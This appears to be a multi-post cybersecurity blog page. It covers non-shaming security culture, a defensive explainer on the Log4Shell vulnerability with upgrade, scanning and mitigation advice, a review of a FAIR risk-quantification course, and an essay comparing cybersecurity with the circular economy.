Rethinking Cybersecurity: Challenging the Commoditisation and Embracing Restorative Practices
Since I started in Cybersecurity, I have observed that cybersecurity has become dominated by insincere vendors and practitioners driven solely by profit. As a cybersecurity leader, I have also noticed the increasing commoditisation of cybersecurity over the years, and it’s important for us to address this issue.
Going deeper into the motives, I realised the significance of my blog’s title. Initially, I chose the name to reflect the current state of cybersecurity, where my work felt repetitive and inconsequential, like an assembly line. However, regardless of the organisation, the same recurring non-technical issues persisted.
The primary challenge lies in the way security practitioners interact with the people they are meant to protect within these organisations. Those outside the security team are often victim-shamed and blamed for their perceived ignorance as if they are at fault for not prioritising cybersecurity in their daily work.
Security organisations sometimes oppress the very people they are meant to serve. This behaviour struck me as counterproductive and degrading, particularly as I familiarised myself with nonviolent communication and other conflict-resolution techniques. I wondered whether adopting peacebuilding methods could foster collaboration and alignment among stakeholders. While only a few security practitioners initially showed interest, the transition to DevOps and shift left strategy, emphasising these attributes, attracted like-minded individuals.
Additionally, the way users are treated is like the punitive and shaming approach commonly seen in the criminal justice system. However, this approach has not reduced crime or supported victims. On the other hand, restorative justice, which focuses on repairing the harm caused by crime and restoring the community while respecting the dignity of all involved parties, has shown promise.
Evidence suggests that traditional fear-based and shaming tactics have not effectively promoted user compliance in cybersecurity. Instead, creating a supportive workplace environment has been identified as a more practical approach to encouraging voluntary security behaviours.
In the rapidly evolving landscape of cybersecurity, organisations must adapt their approaches. Rather than relying on fear, uncertainty, and doubt (FUD)-based strategies, we must acknowledge the value of users as allies and reposition cybersecurity as a collaborative effort. This involves a fundamental shift in the industry, prioritising collaboration, understanding, and support to foster a culture of proactive cybersecurity measures. By moving away from fear-based tactics and embracing a more cooperative approach, organisations will be better equipped to mitigate threats and safeguard information.
On 10th Dec 2021, a zero-day vulnerability was announced in Apache’s Log4j library, which has made Log4shell one of the most severe vulnerabilities since Heartbleed. Exploiting this vulnerability is trivial, and therefore we have seen new exploits daily since the announcement. Some of us will be spending this holiday period mitigating this vulnerability.
Since the announcement last weekend, a lot has been written about Log4Shell. Researchers are finding new exploits in the wild and are adjusting the response. I am not trivialising the extent and impact of this vulnerability with the title of this post. Still, I would like to suggest taking a step back, bringing some calm and strategising the mitigation plan. We are in the early stages of the response, and if the past week is any indication, we are here for the long haul.
In this post, I will be focussing on the two aspects of this zero-day. Technical aspects, for sure, is paramount and requires immediate attention. However, the long-term governance is equally important and will ensure that we are not blindsided with that one insignificant application, which was ignored or seen as low-risk.
So, what is Log4Shell vulnerability?
Apache’s Log4j API1, an open-source Java-based logging audit framework, is commonly used by many apps and services. As a result, an attacker can use a well-crafted exploit to break into the target system, steal credentials and logins, infect networks, and steal data. Due to the extent of the use of this library, the impact is far-reaching. In addition, log4j is used worldwide across software applications and online services, and the vulnerability requires very little expertise to exploit. These far-reaching consequences make Log4shell potentially the most severe computer vulnerability in years.
The “Log4Shell” (CVE-2021–44228) is the name given to the vulnerability in the Log4J library. Apache Log4j2 2.14.1 and below are susceptible to a remote code execution vulnerability where a remote attacker can leverage this vulnerability to take full control of a vulnerable machine. The Log4Shell vulnerability is exploited by injecting a JNDI2 LDAP3 string into the logs, triggering Log4j to contact the specified LDAP server for more information.
In a malicious scenario, the attacker can use the LDAP server to serve the malicious code back to the victim’s machine, which will then be automatically executed in the memory. Data injected by an untrusted entity for merely logging into a file can take over the logging server. What this means for you is an instruction to log activity, but if exploited can soon become a data-leak scenario or run the malicious code for once scenario.
Simply, an event log intended and required for completeness could turn into a malware implantation event. This is nasty and requires taking all necessary steps to ensure that you don’t fall victim to this malicious scenario.
Am I affected?
Overwhelmingly “yes”, unless proven otherwise. Almost every software or service will have some sort of logging capability. Software’s behaviours are logged for development, operational and security purposes. Apache’s Log4j is a very common component used for this purpose.
For individuals, Log4jshell will most certainly impact you. Most devices and services you use online daily will be impacted. Keep an eye on the updates and instructions from the vendors of these devices and services for the next few days and weeks. As soon as the vendor releases a patch, update your devices and services to mitigate the risk associated with this vulnerability.
For businesses, it is going to be very tricky, and the true impact may not be clear immediately. In addition, even though Apache has already recommended upgrading to Version 2.17, there may be various implementations of the Log4J library. So again, keep an eye on the vendors releasing patches and installing as soon as possible.
How to find if your server is impacted or not?
The answer to this question is not straightforward. It is challenging to find if a given server is affected or not by the vulnerability in your network. You might assume that only the public-facing servers running code written in Java handle incoming requests handled by Java software and the Java runtime libraries. Then, for sure, you can consider yourself safe if the frontend is built products such as Apache’s-HTTPd web server, Microsoft IIS, or Nginx as all these servers are coded in C or C++.
As more information is coming on the breadth and depth of this vulnerability, it looks the Log4Shell is not limited to servers coded in Java. Since it is not the TCP-based socket handling code vulnerability, it can stay hidden in the network where user-supplied data is processed, and logs are kept even if the frontend is a non-java platform, you may get caught between what you know and all those third-party java libraries that might make part of the overall application code vulnerable to this vulnerability.
Ideally, every application on your network must be evaluated that is written in Java for the Log4j library. You can take the following two approaches:
Search for Vulnerable Code: Initiate a search for vulnerable code by scanning all servers and applications for vulnerable versions of Log4j libraries. Since Log4j code could be buried deep inside a Java class, a basic search for Log4j will not be good enough. To be certain, you may have to use additional tools and techniques. There are two (2) open-source scanning tools available that can list out code versions or vulnerable code: • Grype (https://github.com/anchore/grype) — Searches libraries installed on a system and displays vulnerabilities present • Syft (https://github.com/anchore/syft) — Searches for installed code and libraries and displays their versions
2. Active Scanning of Deployed Code: Nessus with updated plugins can be used for active vulnerability scanning to identify if the vulnerability exists or not. Some security vendors have also set up public websites to conduct minimal testing against your environment. Following are some of the open-source and commercial tools that can be used for the active scanning:
How can I mitigate Log4Shell and prevent an attack?
In principle, the prevention and prevention techniques are no different from a response to any zero-day, for that matter. The vulnerability is both complex and trivial to exploit, and therefore, it doesn’t necessarily mean that the vulnerability can be successfully exploited. Some of several pre- and postconditions are met for a successful attack. Some of these pre-conditions, such as the JVM being used, the server/app configuration, version of the library etc., will decide successful exploitation. On 17th Dec, Apache Foundation announced the original fix was incomplete and released the second fix in version 2.17.0.
At the time of writing, this post following is the current list of vulnerabilities and recommended fixes: • CVE-2021–44228 (CVSS score: 10.0) — A remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (Fixed in version 2.15.0) • CVE-2021–45046 (CVSS score: 9.0) — An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (Fixed in version 2.16.0) • CVE-2021–45105 (CVSS score: 7.5) — A denial-of-service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (Fixed in version 2.17.0) • CVE-2021–4104 (CVSS score: 8.1) — An untrusted deserialization flaw affecting Log4j version 1.2 (No fix available; Upgrade to version 2.17.0)
The Swiss Government’s CERT provides quite a good visualisation of the attack sequence recommending mitigations for each of the vulnerable points in the sequence.
Where from here?
Keep Calm and Carry On……. We are here for the long haul, and there is no easy fix. You may find that you have fixed one app or server today; something else will pop-up next morning. If you have not done it yet, the best will be to set up a generic incident response playbook for zero-day vulnerabilities. This will help you respond to any such event in the future in a systematic way. The key to success here is keeping an eye on the tools and techniques and their effectiveness to respond to any new zero-day.
As far as Log4Shell is concerned, we are still in the early days and can’t be sure that once patched, and there will never be something else. This is evident from the fact that in the last week or so since the announcement of the original CVE, three more have been attributed to Log4J libraries. As a result, the Apache Foundation has recommended the following mitigations to prevent the exploitation of vulnerable code.
First, upgrade vulnerable versions of Log4j to version 2.17.0 or apply vendor-supplied patches. Although, for some reason, if it is not possible to upgrade, some workarounds can be used. However, there is always some risk of additional vulnerabilities (CVE-2021–45046) that will make the workarounds ineffective. Therefore, it will be best to upgrade to version 2.17. In addition to the above, some of the common mitigations must be considered and applied. • Isolate systems must be restricted into their security zones, i.e. DMZs or VLANs. • All outbound network connections from servers are blocked unless required for their functional role. Even then, restrict outbound network connections to only trusted hosts and network ports. • Depending on your endpoint protection strategy, update any signature or plugin to prevent Log4j exploitation. • Continuous monitoring of networks and servers for any indicators of compromise (IOC). • It has been seen that even after the patch is implemented, vulnerability may persist. Therefore, testing and retesting after the patch is implemented must be ensured as part of the mitigation plan. The time we are living in, such events have become a norm. Vulnerable code, unfortunately, is inevitable, and there will always be someone who would be keen to identify such code to exploit for vested interest. It is only time when we will be hacked, and that one incident may disrupt your business. Therefore, it is paramount to develop and implement business continuity plans that can minimise the impact of such an event. These plans must be updated and tested regularly to ensure changing threat scenarios. Security incident response plans must be practised regularly as a “way of life” and adjusted when a new vulnerability or a threat scenario is identified.
In situations like Log4j zero-day, one can get overwhelmed with the sheer volume of work that we need to do to protect ourselves. As Huntress Labs Senior Security Researcher John Hammond said, “All threat actors need to trigger an attack is one line of text,” but the responders need to spend hours, days and weeks on protecting themselves. In such overwhelming scenarios, I will recommend taking a long breath and keeping calm while doing what we need to do. Reach out to people, and don’t be shy to ask for help if you are stressed. I wish all the best to all of you who will be required to stay back during the holiday to keep your businesses protected.
I did my FAIR analysis fundamentals course a few years ago and here are my thoughts on it.
FAIR stands for Factor Analysis of Information Risk, and is the only international standard quantitative model for information security and operational risk. (https://www.fairinstitute.org/)
My interest to learn more about FAIR came from two observations.
The first was that we had many definitions of what constitute risk. We refer to “script-kiddies”as risks. Not having a security control is referred to as risk. SQL injection is a risk. We also said things like “How much risk is there with this risk?”
The other observation was with our approach at quantifying risk. We derived the level of risk based on the likelihood and impact. And sometimes it was hard to get agreement on those values.
Having completed the course, one of the things I like about FAIR is their definitions. Their definitions of what is a risk, and what it must included. It should include an asset, threat, effect with a method that could be optional. An example of a risk is the probability of malicious internal users impacting the availability of our customer booking system via denial of service.
It uses future loss as the unit of measurement rather than a rating of critical, high, medium & low. The value of future loss is expressed as a range with a most likely value along with the confidence level of that most likely value. As such it focuses on accuracy rather than precision. I quite like that as it makes risk easier to understand and compare. Reporting that a risk has a 1 in 2 year probability of happening with a loss between $20K to $50K but likely being $30K is a lengthy statement. However it is more tangible and makes more sense than reporting that the risk is a High Risk.
Now it sounds like I’m all for FAIR, but I have some reservations. The main one being that there isn’t always data available to determine such an empirical result. Risk according to FAIR is calculated by a multiplication of loss frequency (the number of times a loss event will occur in a year) with loss magnitude (the $ range of loss from productivity, replacement, response, compliance and reputation). It’ll be hard to come up with a loss frequency value when there is no past data to base it on. I’ll be guessing the value and not estimating it. FAIR suggests doing an estimate for a subgroup if there isn’t enough reliable data available, but again I see the same problem. The subgroup for loss frequency is the multiplication of number of time the threat actors attempt to effect the asset with the percentage of attempts being successful. Unless you have that data, that to me is no less easier to determine.
Overall it still feels like a much better way of quantifying risk. I’ll end with a quote from the instructor. “Risk statements should be of probability, not of predictions or what’s possible.” It resonated with me as it is something I too often forget.
Cybersecurity and Circular Economy (CE) are not the terms taken together. Cybersecurity is often related to hacking, loss of privacy or phishing, and CE is about climate change and environmental protection. However, cybersecurity can learn quite a few things from CE, and this post will focus on our learnings from CE for cybersecurity sustainability.
In the times we live in, our economy is dependent on taking materials from the natural resources existing on Earth, creating products that we use, misuse, and eventually throw as waste. This linear process creates tons of waste every day presenting sustainability, environmental, and climate change challenges. On the other hand, CE strives to stop this waste & pollution, retrieve & circulate materials, and, more importantly, recharge & regenerate nature. Renewable Energy and materials are key components of CE. It is such a resilient system that detaches economic activity from the consumption of products.
CE is not a new concept but is popularised by a British sailor, Ellen Macarthur. Her charity advises governments and organisations on CE. The following picture is the “butterfly diagram”, which illustrates the continuous flow of materials within the economy independent of the economic activity. As shown in the picture, CE has two main cycles- The technical and the Biological Cycle. In the technical cycle, the materials are repaired, reused, repurposed, and are recycled to ensure that the products are circulating in the economy. However, in the biological cycle, the biodegradable organic materials are returned to the Earth by triggering decomposition, allowing nature to regenerate, continuing the cycle.
As noted above, the lack of CE can be devastating for the planet. Humans are producing a humongous amount of waste loitered around us is unsustainable and devastating for the humans and other inhabitants of Earth. Similarly, with the ever-increasing cost of cyber-attack breaches, businesses are vulnerable to extinction. IBM Security and the Ponemon Institute commissioned Cost of a Data Breach Report 2021. According to this report, the cost of breaches has increased by 10% in the year 2021, which is the largest is the largest single-year on year increase. The business loss represents 38% of the breach costs due to customer turnover, revenue loss, downtime, and increased cost of acquiring new business (diminished reputation).
Sustainability is about using and/or reusing something for an extended period without reducing its capability from short- to long-term perspectives. Cybersecurity is sustainable if the implemented security resources do not degrade or become ineffective over some time to mitigate security threats. Achieving sustainability is not easy and, most certainly, is not cheap. The organisations must take a principle-based approach to cybersecurity. As the manufacturing process within CE where sustainability is considered from the ground up, Security must be part of the design and production phase of the products. The system shall be reliable enough to provide its stated function. For example, a firewall should block any potential attack even after a hardware failure or a hacker taking advantage of a zero-day compromising your environment.
By nature, digital systems produce an enormous amount of data, including security-specific signals. Unfortunately, finding a needle from a haystack is challenging and often overwhelmingly laborious. In CE, we have found ways to segregate different types of waste right at the source, making it easier to collect, recycle and repurpose faster. Similarly, the systems shall be designed to separate relevant security data from other information at the source rather than leave it to the security systems. This segregation at source will help reduce false positives and negatives, providing reliable and accurate information which can be used for protection. The improved data accuracy will also help prioritise response and recovery activities due to a security incident.
CE’s design principles clearly define its two distinct cycles (technical and biological) as mentioned above in the post to deal with biodegradable and non-biodegradable materials. These cycles ensure that the product’s value is maintained, if possible, by repairing, reusing, or recycling the non-biodegradable materials. Similarly, the materials are returned to nature through the processes such as composting. Cybersecurity, despite the conceptual prevalence of “Secure by Design” principles for a long time, the systems, including security products and platforms, often ignore these principles in the name of convenience and ease of use. Any decent security architecture shall ensure that the design process inherently considers threat modelling to assess risks. The implemented systems are modular, retaining their value for as long as value. This will guarantee that the cybersecurity products, platforms and services are producing the desired outcome and are aligned to the organisation’s business requirements. There shall always be an option to repurpose or recycle components to return on security investment.
The technical cycle in CE is resilient to change dynamically. As discussed above, CE is predominantly detached from the economic conditions and shall continue to hold value until the product can no further be repaired, reused or repurposed. If the product or a component can’t be used, its materials can be recycled to produce new products by recovering and preserving their value. Cyber resiliency is not something new but is being contextualised in recent times by redefining its outcome. As we know, cyber threat paradigms are continually changing, and only resilient systems are known to withstand such a dynamic. Resilient cybersecurity can assist in recovering efficiently from known or unknown security breaches. Like CEs technical cycle, achieving an effective resiliency takes a long time. First, baseline cybersecurity controls are implemented and maintained. Similarly, redundancy and resiliency go hand in hand and therefore, redundancy should just be included by design.
I am sure we can learn many more things from CE to set up a sustainable and resilient cybersecurity program that is self-healing and self-organising to ensure that systems can stop security breaches. So I would like to know what else we can learn from CE. .